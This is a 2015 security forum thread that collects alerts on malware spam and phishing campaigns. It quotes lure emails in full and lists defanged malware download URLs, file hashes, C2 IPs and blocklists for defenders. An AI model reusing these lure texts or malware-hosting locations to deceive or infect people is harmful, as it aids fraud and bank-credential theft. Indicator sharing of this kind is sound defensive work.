- http://myonlinesecurity.co.uk/order-confirmation-ret-385236-250615-royal-canin-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2015 - "'Order Confirmation RET-385236 250615' pretending to come from [1NAV PROD RCS] <donotreply@ royal-canin .fr> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
[Garbled text in body]... When it is repaired it then reads:
Please find attached your Sales Order Confirmation
Note: This e-mail was sent from a notification only e-mail address that
cannot accept incoming e-mail. PLEASE DO NOT REPLY TO THIS MESSAGE.
This has an attachment as described below:
25 February 2015: Order Confirmation RET-385236 250615.doc - Current Virus total detections: 4/56*
... which is a macro downloader that downloads Dridex banking malware in exactly the -same- way and from the same series of locations as today’s other malspam runs 'Notification of Vehicle Tax DD Payment Schedule (Ref: 000000-000005-274421-001)' - word doc or excel xls spreadsheet malware -and- 'Scanned from a Xerox Multifunction Printer' – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/369c3e84e9a288b3f2df0672c3dd2eaa208c9d2e6ac10c36a04b9e3ff52f8b4d/analysis/1435313019/
- http://blog.dynamoo.com/2015/06/malware-spam-order-confirmation-ret.html
26 June 2015
"... Recommended blocklist:
68.169.49.213
87.236.215.151
2.185.181.155 "
colchester-institute .com: 213.171.218.136: https://www.virustotal.com/en-gb/ip-address/213.171.218.136/information/
___
Fake 'Transport' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/email-from-transport-for-london-word-doc-or-excel-xls-spreadsheet-malware-2/
26 June 2015 - "Email from 'Transport for London' pretending to come from noresponse@ cclondon .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Please open the attached file to view correspondence from Transport for
London.
If the attachment is in DOC format you may need Adobe Acrobat Reader to
read or download this attachment.
Thank you for contacting Transport for London.
Business Operations
Customer Service Representative
This email has been scanned by the Symantec Email Security.cloud service...
26 June 2015: AP0210932630.doc - Current Virus total detections: 5/54*
... which is yet another in today’s -malspam- series of macro malware downloaders that deliver Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/a97b05797f326e8e8ba79f12d15a523096be31b13c19d7569b82995b957616ec/analysis/1435315714/
___
Samsung's bundled SW Update tool actively -disables- Windows Update on reboot
- http://arstechnica.com/information-technology/2015/06/samsung-silently-disabling-windows-update-on-some-computers/
Updated, June 25... "... We have reached out to both Samsung and Microsoft for comment, but they hadn't replied at the time of publishing... SW Update is included on many Samsung PCs, but it's possible that Disable_Windowsupdate.exe is only being executed on a subset of devices that are "incompatible" with Windows Update. If you have a Samsung laptop, perhaps go and check if Windows Update is still enabled..."
> Unresolved.
- http://www.neowin.net/news/samsung-cripples-windows-update-to-help-your-settings
Jun 24, 2015
___
Critical flaw in ESET products...
- http://www.infoworld.com/article/2939759/security/critical-flaw-in-eset-products-shows-why-spy-groups-are-interested-in-antivirus-programs.html
Jun 24, 2015 - "Several antivirus products from security firm ESET had a critical vulnerability that was easy to exploit and could lead to a full system compromise. The discovery of the flaw, which has now been patched*, comes on the heels of a report that intelligence agencies from the U.K. and the U.S. are reverse engineering antivirus products in search for vulnerabilities and methods to bypass detection..."
* http://www.virusradar.com/en/update/info/11824
2015-06-22 - "A security vulnerability has been -fixed- in the scanning engine..."
___
Memo Spam
- http://threattrack.tumblr.com/post/122516583493/memo-spam
26 June 2015 - "Subjects Seen:
Memo dated 9th June
Memo dated 13th March
Screenshot: https://36.media.tumblr.com/f0a1d3289633d50e98c984669d0bef6f/tumblr_inline_nqkat2Drzx1r6pupn_500.png
Typical e-mail details:
Be acknowledged that on Monday the 6th of May a letter was forwarded to chief accountant The indicated act has important information considering the levy refund procedure
We ask you to verify the proper receiving of the facsimile .
For Your convenience this document had been attached.
Helen Smith
Tax Officer
Malicious File Name and MD5:
fragment_of_the_forwarded_prescript.exe (d8885ab98d6e60295a4354050827955e)
Tagged: Memo, Upatre
___
Stop Spamming Me Spam
- http://threattrack.tumblr.com/post/122423543503/stop-spamming-me-spam
25 June 2015 - Subjects Seen
stop spamming me
Screenshot: https://40.media.tumblr.com/754a6563af064dc0d95dbe704bbbaa77/tumblr_inline_nqi9o9eMIU1r6pupn_500.png
Typical e-mail details:
stop sending me offers from towcaps.com
i am not interested.
i have attached the email i received from jmcfarland@ towcaps .com.
please stop
Malicious File Name and MD5:
email_message.doc (26185bf0c06d8419c09c76a0959d2b85)
Tagged: Word Macro Exploit, Fareit, Stop Spamming
___
Signed CryptoWall 3.0 variant delivered via MediaFire
- http://research.zscaler.com/2015/06/signed-cryptowall-30-variant-delivered.html
June 4, 2015 - "... search lead us to this e-mail campaign* where the attachment contains a Microsoft Compiled HTML help (CHM) file that leads to the download and execution of the the latest CryptoWall 3.0 variant hosted on MediaFire..."
* https://techhelplist.com/index.php/spam-list/834-you-have-a-new-encrypted-message-from-jpmorgan-chase-co-malware
>> https://malwr.com/analysis/MTBhNWQ5NjRiZGMzNDIyNGE3Y2VmMGIyOWZjM2I3YTU/
"... Hosts..."
[CryptoWall 3.0] / -Still- -all- pumping badness 6.26.2015 !!
IP
188.165.164.184: https://www.virustotal.com/en/ip-address/188.165.164.184/information/
184.168.47.225: https://www.virustotal.com/en/ip-address/184.168.47.225/information/
62.221.204.114: https://www.virustotal.com/en/ip-address/62.221.204.114/information/
80.93.54.18: https://www.virustotal.com/en/ip-address/80.93.54.18/information/
50.62.160.229: https://www.virustotal.com/en/ip-address/50.62.160.229/information/
217.70.180.154: https://www.virustotal.com/en/ip-address/217.70.180.154/information/
184.168.174.1: https://www.virustotal.com/en/ip-address/184.168.174.1/information/
64.202.165.42: https://www.virustotal.com/en/ip-address/64.202.165.42/information/
46.235.40.4: https://www.virustotal.com/en/ip-address/46.235.40.4/information/
194.6.233.7: https://www.virustotal.com/en/ip-address/194.6.233.7/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-29, 13:32
FYI...
Multiple Exploit kits abuse CVE-2015-3113
- http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html
June 29, 2015 - "Patched... (2015-06-23) with Flash 18.0.0.194*, the CVE-2015-3113 has been spotted as a 0day by FireEye, exploited in limited targeted attacks. It's now making its path to Exploit Kits...
Magnitude: 2015-06-27 ... IE11 in Windows 7... 2015-06-27
Angler EK: 2015-06-29 ... IE11 in Windows 7... 2015-06-29
* https://helpx.adobe.com/security/products/flash-player/apsb15-14.html
> https://technet.microsoft.com/en-us/library/security/2755801
June 23, 2015
___
Fake 'Hello' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/hello-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'Hello' pretending to come from Willa <swaffs@ tiscali .co.uk> with a malicious word doc rtf attachment is another one from the current bot runs... The email looks like:
I reserved for myself and friends three double rooms with 30.06 to 14:06.
I wanted to change a reservation!
Because some friends canceled, I would like to change reservation to two double room!
Thanks!
Therese.
28 June 2015: document.rtf - Current Virus total detections: 8/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/f323bcc11ee34b2158a6d73db81cd76e64cdea5a7fa8e9cf59a1db4f59bc9adf/analysis/1435533593/
___
Fake 'WhatsApp Chat' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/whatsapp-chat-with-jay-stephenson-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'WhatsApp Chat with Jay Stephenson' pretending to come from your own email address with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Chat history is attached as “WhatsApp Chat: Jay Stephenson.txt” file to this email.
29 June 2015 : WhatsApp Chat_ Jay Stephenson.doc Current Virus total detections: 4/55*
... Which downloads Dridex banking malware from http ://dev.seasonsbounty .com/543/786.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/1dd4601705e197fe4528a50a4cca282ea9ffb45249ff5fdb3d538a79dccea157/analysis/1435562464/
** https://www.virustotal.com/en-gb/file/4409a44e91dc654a91b7a9b73af8f51b60b3b6e89beabe08d79179ddd7d5209e/analysis/1435564213/
... Behavioural information
TCP connections
78.47.139.58: https://www.virustotal.com/en-gb/ip-address/78.47.139.58/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
seasonsbounty .com: 104.28.28.38: https://www.virustotal.com/en-gb/ip-address/104.28.28.38/information/
104.28.29.38: https://www.virustotal.com/en-gb/ip-address/104.28.29.38/information/
___
Fake 'CEF Documents' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/cef-documents-dawn-sandel-word-doc-or-excel-xls-spreadsheet-malware/
29 June 2015 - "'CEF Documents pretending to come from Dawn.Sandel@ cef .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached the following documents issued by City Electrical Factors:
Invoice – BLA/176035 – DUCHMAID
If you have any problems or questions about these documents then please do not hesitate to contact us.
Regards,
Dawn Sandel ...
29 June 2015 : BLA176035.doc - Current Virus total detections: 5/56*
... Downloads the same Dridex banking malware as described in today’s earlier malspam run of malicious word docs 'WhatsApp Chat with Jay Stephenson' – word doc or excel xls spreadsheet malware** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/c1188f42836fce82819134340b1726fdb1ee3234aaaef1674924602ead39b1ef/analysis/1435572586/
** http://myonlinesecurity.co.uk/whatsapp-chat-with-jay-stephenson-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/06/malware-spam-cef-documents.html
29 June 2015
"... Recommended blocklist:
78.47.139.58
87.236.215.151
91.121.173.193
183.81.166.5 "
___
Fake 'Payslip' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-payslip-for-period-end.html
29 June 2015 - "This -fake- financial spam comes with a malicious payload:
From: noreply@ fermanagh .gov.uk [noreply@ fermanagh .gov.uk]
Date: 29 June 2015 at 11:46
Subject: Payslip for period end date 29/06/2015
Dear [redacted]
Please find attached your payslip for period end 29/06/2015
Payroll Section
Attached is a file payslip.zip which contains the malicious executable payslip.exe which has a VirusTotal detection rate of 8/55*. Automated analysis... shows a file being downloaded from:
http :// audileon .com.mx/css/proxy_v29.exe . That binary has a detection rate of just 2/55 [Malwr analysis**] Also, Hybrid Analysis... shows the following IPs are contact for what looks to be malicious purposes:
69.73.179.87 (Landis Holdings Inc, US)
67.219.166.113 (Panhandle Telecommunications Systems Inc., US)
212.37.81.96 (ENERGOTEL a.s./ Skylan s.r.o, Slovakia)
209.193.83.218 (Visionary Communications Inc., US)
67.206.96.30 (Chickasaw Telephone, US)
208.123.129.153 (Secom Inc , US)
91.187.75.75 (Servei De Telecomunicacions D'Andorra, Andorra)
84.16.55.122 (ISP Slovanet (MNET) Brezno, Czech Republic)
178.219.10.23 (Orion Telekom, Serbia)
194.28.190.84 (AgaNet Agata Goleniewska, Poland)
83.168.164.18 (SWAN, a.s. TRIO network, Slovakia)
178.54.231.147 (PP Merezha, Ukraine)
75.98.158.55 (Safelink Internet, US)
67.206.97.238 (Chickasaw Telephone, US)
176.197.100.182 (E-Light-Telecom, Russia)
31.134.73.151 (Trk Efir Ltd., Ukraine)
188.255.241.22 (Orion Telekom, Serbia)
31.42.172.36 (FLP Pirozhok Elena Anatolevna, Ukraine)
67.207.228.144 (Southwest Oklahoma Internet, US)
176.120.201.9 (Subnet LLC, Russia)
109.87.63.98 (TRIOLAN / Content Delivery Network Ltd, Ukraine)
38.124.169.148 (PSINet, US)
80.87.219.35 (DSi DATA s.r.o., Slovakia)
195.34.206.204 (Private Enterprise Radionet, Ukraine)
93.119.102.70 (Moldtelecom LIR, Moldova)
184.164.97.242 (Visionary Communications Inc., US)
I am unable to determine exactly what the payload is..."
Recommended blocklist:
69.73.179.87
67.219.166.113
212.37.81.96
209.193.83.218
67.206.96.30
208.123.129.153
91.187.75.75
84.16.55.122
178.219.10.23
194.28.190.84
83.168.164.18
178.54.231.147
75.98.158.55
67.206.97.238
176.197.100.182
31.134.73.151
188.255.241.22
31.42.172.36
67.207.228.144
176.120.201.9
109.87.63.98
38.124.169.148
80.87.219.35
195.34.206.204
93.119.102.70
184.164.97.242 "
* https://www.virustotal.com/en/file/7abf401381b81d0effcf074df3fe1d38b38cf513f8ec202fbe1ce150c45c6f8d/analysis/1435584105/
** https://malwr.com/analysis/M2FkNDQyNGY0YjdkNDdiN2E3ZjQ3MWE1Y2RkYTg2Mzc/
audileon .com.mx: 69.73.179.87: https://www.virustotal.com/en/ip-address/69.73.179.87/information/
___
Fake 'Paypal' PHISH...
- http://myonlinesecurity.co.uk/receipt-for-your-paypal-payment-to-zynga-gamesfacebook-com-phishing/
28 June 2015 - "'Receipt for your PayPal payment to Zynga Games@ facebook .com' pretending to come from service@ paypal .com.au <payment.refunds@ netcabo .pt> is one of the latest -phish- attempts to steal your Paypal account and your Bank, credit card and personal details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/paypal_save-the-whales-phish_email.png
The link in the email when you hover over it sends you to http ://guyit64d43tyw45uaer .saves-the-whales .com/ATERJT 8OYG8 JHG5R8 YRDTDY JYUGH DRYCJ/
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-1.png
After entering email and password, you get sent to a page saying your account has been -frozen- due to fraud, continue to resolution centre to sort it out.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/paypal_save-the-whales-phish.png
Following that link gets you to the nitty-gritty of the phishing scam and you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
saves-the-whales .com: 204.13.248.119: https://www.virustotal.com/en-gb/ip-address/204.13.248.119/information/
afrikids .com.mx: 192.185.140.214: https://www.virustotal.com/en-gb/ip-address/192.185.140.214/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-30, 14:32
FYI...
Fake Twitter Verification Profile leads to Phishing, Credit Card Theft
- https://blog.malwarebytes.org/fraud-scam/2015/06/fake-twitter-verification-profile-leads-to-phishing-credit-card-theft/
June 30, 2015 - "... we’ve come across a -bogus- Twitter account harbouring a nasty surprise for anybody taken in by their fakery. Twitter Feed “Verified6379″ claims to be an “Official Verification Page” with a link to a shortened Goo.gl URL. The site it directs visitors to is:
verifiedaccounts(dot)byethost9(dot)com/go(dot)html
Here’s the Twitter feed in question:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif0.jpg
... This week has seen 3,000+ click the link so far, with the majority of visitors coming from the US and UK. What do those with a thirst for verification see upon hitting the page? A rather nasty double whammy of phishing and payment information theft. First up, the -phish- which aks for Username, Password and Email along with questions about why the victim thinks they should be verified, if they’ve ever been suspended and how many followers they have. Note that once the accounts have been compromised, information such as follower count makes it easy for the phisher to work out which are the best ones to use to spread more malicious links:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif1.jpg
After this, the verification hunter will be presented with the below screen:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/faketwtverif2.jpg
The page reads as follows:
Congratulations! You are one step away from being verified, please understand we require each user to pay the $4.99 verification fee. Processing this fee allows us to verify your identity much faster.
Uh oh. They then go on to ask for card number, expiration date, CVV, name, address, phone number, state, country and zip code along with a confirmation email. There’s no way to know how many people completed all of the steps, but there’s potential here for the scammers to have made off with quite the haul of stolen accounts and pilfered payment credentials. Note that the so-called payment page doesn’t have a secured connection either, so if a third party happened to be snooping traffic and you were on an insecure connection there’d now be two people running around with your information instead of just one. We’ve seen a number of possibly related accounts pushing out similar links, all offline / suspended at time of writing. There’s sure to be others floating around, so please be careful with your logins... more information on Twitter Verification, you should read their FAQ page. From a related article:
'Twitter currently does -not- accept applications for verification. If we identify your account as being eligible, we will reach out to you to start the verification process'.
The only Twitter feed you should pay any attention to with regards the little blue tick is the Official Verification account – anybody else should be treated with caution, especially if asking for logins via Direct Message or websites asking for -credentials- and / or -payment- information..."
verifiedaccounts(dot)byethost9(dot)com: 185.27.134.210: https://www.virustotal.com/en/ip-address/185.27.134.210/information/
___
Fake 'Bank payment' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/bank-payment-sbp-beauty-lifestyle-hairandhealth-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
30 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached a bank payment for 28th June 2015 for £288.00
to pay inv 1631 less cr 1129. With thanks.
Kind regards
Sarah
Accounts
SBP Beauty & Lifestyle
30 June 2015: Bank payment 281014.doc - Current Virus total detections: 3/56*
... Downloads Dridex banking malware from:
http ://www .medisinskyogaterapi .no/59/56.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/50fa7ce0c13cdeac8006f12ae4669192cb53adf5953ce48c387ecc1bdb13c270/analysis/1435652743/
** https://www.virustotal.com/en/file/49e611323dd020e5df8f91c2f4005f05fc09213ceb8983d695dc4b93a32f02d4/analysis/1435653462/
... Behavioural information
TCP connections
78.47.139.58: https://www.virustotal.com/en/ip-address/78.47.139.58/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'Payment due' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/06/malware-spam-donna-vipond-donnavipondev.html
30 June 2015 - "This -fake- invoice does not come from Event Furniture Ltd but is instead a simple forgery with a malicious attachment:
From "Donna Vipond" [donna.vipond@ ev-ent .co.uk]
Date Tue, 30 Jun 2015 13:13:28 +0100
Subject Payment due - 75805
Please advise when we can expect to receive payment of the attached
invoice now due? I await to hear from you.
Kind Regards
Donna Vipond
Accounts
Event Furniture Ltd T/A Event Hire
Tel: 01922 628961 x 201
Attached is a file 75805.doc which comes in two (or more) different versions (Hybrid Analysis report). The samples I saw downloaded a file from either:
www .medisinskyogaterapi .no/59/56.exe
www .carpstory .de/59/56.exe
This is saved as %TEMP%\silvuple.exe and it has a VirusTotal detection rate of 6/55*. The various analyses including Malwr report and Hybrid Analysis indicate malicious traffic to 78.47.139.58 (Hetzner, Germany). The payload is probably the Dridex banking trojan.
Recommended blocklist:
78.47.139.58 "
* https://www.virustotal.com/en/file/f577a7862c68e0114201e4313b53bd2f48f36665f5fe00fe0ffbb41ccaedeabc/analysis/1435667157/
medisinskyogaterapi .no: 178.164.11.101: https://www.virustotal.com/en/ip-address/178.164.11.101/information/
carpstory .de: 81.169.145.164: https://www.virustotal.com/en/ip-address/81.169.145.164/information/
- http://myonlinesecurity.co.uk/payment-due-75805-donna-vipond-event-furniture-word-doc-or-excel-xls-spreadsheet-malware/
30 June 2015 - "... -same- Dridex banking malware as today’s other malspam run of macro enabled word docs Bank payment SBP Beauty & Lifestyle hairandhealth .co.uk* – word doc or excel xls spreadsheet malware..."
> https://www.virustotal.com/en/file/e14b3d3487e112648002d70db804e24e2d123d3ecb22f2e2cbd0276bd743a815/analysis/1435667097/
* http://myonlinesecurity.co.uk/bank-payment-sbp-beauty-lifestyle-hairandhealth-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
___
RFC 7568 Deprecates SSLv3 As Insecure
- http://tech.slashdot.org/story/15/06/30/1457204/rfc-7568-deprecates-sslv3-as-insecure
June 30, 2015 - "SSLv3 should -not- be used*, according to the IETF's RFC 7568. Despite being replaced by three versions of TLS, SSLv3 is still in use. Clients and servers are now recommended to reject requests to use SSLv3 for secure communication. "SSLv3 Is Comprehensively Broken" ** say the authors, and lay out its flaws in detail."
* http://tools.ietf.org/html/rfc7568
** http://tools.ietf.org/html/rfc7568#section-4
___
Malvertising targeting the Netherlands
- http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
Update 16-06-2015: "After coordinating with the advertisers the malicious host was -blocked- and removed from their advertisement platforms. Indicators of Compromise:
The following IP and domain should be -blocked- in order to avoid the current campaign:
otsmarketing[.]com / 107[.]181[.]187[.]81
The Angler Exploit kit typically installs the Bedep Trojan, which installs -additional- malware. Bedep can typically be found by looking at consecutive POST requests to the following two websites:
earthtools .org/timezone/0/0
ecb.europa .eu/stats/eurofxref/eurofxref-hist-90d.xml
We have yet to identify the final payload."
107.181.187.81: https://www.virustotal.com/en/ip-address/107.181.187.81/information/
earthtools .org: Could not find an IP address for this domain name.
ecb.europa .eu: 208.113.226.171: https://www.virustotal.com/en/ip-address/208.113.226.171/information/
:fear::fear: :mad:
AplusWebMaster
2015-07-01, 15:06
FYI...
Fake 'swift bank transfers' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/a-series-of-emails-on-the-theme-of-swift-bank-transfers-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "A series of emails on the theme of swift bank transfers pretending to come from random email addresses and random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Some subjects seen are:
Fw: Automated Clearing House VRD4OB
Fw: Notification 9XLM1B
Fwd Invoice A6MV0KAOT ... The email looks like these:
The RecentJ transfer, just initiated from your company’s online banking account, was rejected by the Electronic Payments Association2.
DeniedZ SWIFT transfer
Transaction4 Case ID 8L515KJY
Total Amount 3526.76 USD ...
Reason of abort See attached statement
Please click the file given with this email to get more information about this issue.
-Or-
The SWIFTD transfer, recently sent from your company’s online bank account, was aborted by the Electronic Payments AssociationV.
Denied2 transaction
TransferB Case ID CUV0RUF
Total Amount 1953.61 US Dollars ...
Reason of abort See attached word document
Please click the doc file attached below to get more info about this issue.
-Or-
The RecentJ transfer, just initiated from your company’s online banking account, was rejected by the Electronic Payments Association2.
DeniedZ SWIFT transfer
Transaction4 Case ID 8L515KJY
Total Amount 3526.76 USD ...
Reason of abort See attached statement
Please click the file given with this email to get more information about this issue.
1 July 2015: EBRSONOU.doc | JIZES.doc | XWUDNJK.doc
Current Virus total detections: 4/56* | 4/56** | 4/56*** |
... All of which try to connect to these 2 sites and download a base64 encoded text file from first location and a simple test text from second location.
www .fresh-start-shopping .com/wp-content/uploads/2015/06/167362833333.txt
www .gode-film .dk/wp-content/uploads/2015/06/kaka.txt
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/da1dc627acabdbc7e42b0968e8c24e4e71d4fc00399ec9a8ceeb0bb195cec2bf/analysis/1435729795/
** https://www.virustotal.com/en-gb/file/a7396d675e563b2dcd3a2a3ad6460d094bffcac9ef7044263063feb0ddd66a52/analysis/1435729826/
*** https://www.virustotal.com/en-gb/file/7fc8781983035da87ec101aece8fba9eb786d937d16f6efb13f30eafaefb2381/analysis/1435729851/
fresh-start-shopping .com: 192.186.246.136: https://www.virustotal.com/en/ip-address/192.186.246.136/information/
gode-film .dk: 81.19.232.168: https://www.virustotal.com/en/ip-address/81.19.232.168/information/
___
Fake 'HMRC taxes application' SPAM - leads to malware
- http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.html
1 July 2015 - "This -fake- tax spam leads to malware:
From "noreply@ taxreg.hmrc .gov.uk" [noreply@ taxreg .hmrc .gov.uk]
Date Wed, 1 Jul 2015 11:20:37 +0000
Subject HMRC taxes application with reference L4TI 2A0A UWSV WASP received
The application with reference number L4TI 2A0A UWSV WASP submitted by you or your
agent to register for HM Revenue & Customs (HMRC) taxes has been received and will
now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here: http ://quadroft .com/secure_storage/get_document.html
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate
Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded
for legal purposes.d
If you have the correct browser agent (e.g. Internet Explorer 8 on Windows) you will see a "Your document will download shortly.." notice. If you have something else, a fake -404- page will be generated:
> https://1.bp.blogspot.com/-8-KFWqr7bvc/VZPQVakQH7I/AAAAAAAAGvY/UPY9foHUjEw/s1600/document.png
The page then forwards to the real HMRC login page but attempts to dump a -malicious- ZIP from another source at the same time:
> https://2.bp.blogspot.com/-Nuz7HP-XSSs/VZPQwIyZjOI/AAAAAAAAGvg/aXHCFba_yMw/s400/fake-hmrc.png
In this case, the ZIP file was Document_HM901417.zip which contains a -malicious- executable Document_HM901417.exe. This has a VirusTotal detection rate of 3/55* (identified as the Upatre downloader). Automated analysis... shows attempted traffic to 93.185.4.90 (C2NET, Czech Republic) and a dropped executable with a random name and an MD5 of ba841ac5f7500b6ea59fcbbfd4d8da32 with a detection rate of 2/55**. The payload is almost definitely the Dyre banking trojan.
* https://www.virustotal.com/en/file/ab036a9c324ad09ab36d3d805e5bcdc8be8103ceb7db3dd5f95dafa1054b96c0/analysis/1435748839/
** https://www.virustotal.com/en/file/8fe73af085c528f4c891757998e7775d68b907678120d8022bbe9cd359b55146/analysis/1435750980/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
___
Fake 'Document Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "'Document Order 555-073766-24707377/1' (random numbers) pretending to come from web-filing@ companies-house .gov.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Order: 555-073766-24707377 29/06/2015 09:35:46
Companies House WebFiling order 555-073766-24707377/1 is attached.
Thank you for using the Companies House WebFiling service.
Email: enquiries@ companies-house .gov.uk Telephone +44 (0)303 1234 500
Note: This email was sent from a notification-only email address which cannot accept incoming email. Please do not reply directly to this message.
1 July 2015: compinfo_555-073766-24707377_1.doc - Current Virus total detections: 4/56*
... Downloads Dridex banking malware from:
http ://ferringvillage .co.uk/75/85.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a831b3e3da00d15a3ab8fe2b67ca5f8641a98715a8ae985acbab90f119d0407d/analysis/1435735503/
** https://www.virustotal.com/en/file/356537501b4d5758471e126a4588d5edd17108164f44846a002af98cfc9d3e06/analysis/1435735797/
ferringvillage .co.uk: 217.72.186.4: https://www.virustotal.com/en/ip-address/217.72.186.4/information/
___
Fake 'Underreported Income' SPAM - links to malware
- http://blog.dynamoo.com/2015/07/malware-spam-notice-of-underreported.html
1 July 2015 - "The second HMRC spam run of the day..
From: HM Revenue and Customs [noreply@ hmrc .gov.uk]
Date: 1 July 2015 at 11:36
Subject: Notice of Underreported Income
Taxpayer ID: ufwsd-000004152670UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form herc
In this case, the link goes to bahiasteel .com/secure_storage/get_document.html however, the payload is Upatre leading to the Dyre banking trojan, as seen in this other spam run* today."
* http://blog.dynamoo.com/2015/07/malware-spam-hmrc-taxes-application.html
bahiasteel .com: 213.186.33.16: https://www.virustotal.com/en/ip-address/213.186.33.16/information/
___
Fake 'Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/statement-jul-2015-phil-twococksbrewery-com-word-doc-or-excel-xls-spreadsheet-malware/
1 July 2015 - "'Statement JUL-2015' pretending to come from Phil <phil@ twococksbrewery .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-LogMeIn-Pro-payment-has-been-processed.png
25 February 2015: logmein_pro_receipt.xls - Current Virus total detections: 7/55*
... Which downloads the -same- Dridex banking malware as today’s earlier examples 'Document Order 555-073766-24707377/1- Companies House WebFiling** – word doc or excel xls spreadsheet malware and 'Document Order 555-073766-24707377/1- Companies House WebFiling*** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29780fbaf1c7b83b408669fcb587fd6b3d4630c00f1d936e5a6ec46360125f34/analysis/1435755731/
** http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
*** http://myonlinesecurity.co.uk/document-order-555-073766-247073771-companies-house-webfiling-word-doc-or-excel-xls-spreadsheet-malware/
:fear::fear: :mad:
AplusWebMaster
2015-07-02, 14:43
FYI...
Angler Exploit Kit pushing CryptoWall 3.0
- https://isc.sans.edu/diary.html?storyid=19863
2015-07-02 - "... Recently, this EK has been altering its URL patterns on a near-daily basis. The changes accumulate, and you might not recognize current traffic generated by Angler... Angler pushes different payloads, but we're still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015:
> https://isc.sans.edu/diaryimages/images/2015-07-02-ISC-diary-image-01.jpg
Traffic from Tuesday, 2015-07-01 shows Angler EK from 148.251.167.57 and 148.251.167.107 at different times during the day..."
(More detail at the isc URL above.)
148.251.167.57: https://www.virustotal.com/en/ip-address/148.251.167.57/information/
148.251.167.107: https://www.virustotal.com/en/ip-address/148.251.167.107/information/
___
The 'Grey Side' of Mobile Advertising
- https://blog.malwarebytes.org/mobile-2/2015/07/the-grey-side-of-mobile-advertising/
